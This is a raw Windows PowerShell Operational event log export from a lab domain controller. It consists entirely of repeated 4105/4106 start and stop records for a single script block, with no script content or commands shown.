ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473855
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473854
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473853
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473852
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473851
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473850
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473849
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473848
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473847
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473846
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473845
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473844
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473843
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473842
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473841
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473840
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473839
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473838
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473837
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473836
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473835
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473834
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473833
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473832
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473831
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473830
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473829
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473828
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473827
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473826
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473825
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473824
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473823
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473822
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473821
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473820
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473819
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473818
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473817
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473816
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473815
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473814
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473813
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473812
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473811
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473810
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473809
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473808
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473807
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473806
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473805
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473804
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473803
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473802
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473801
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
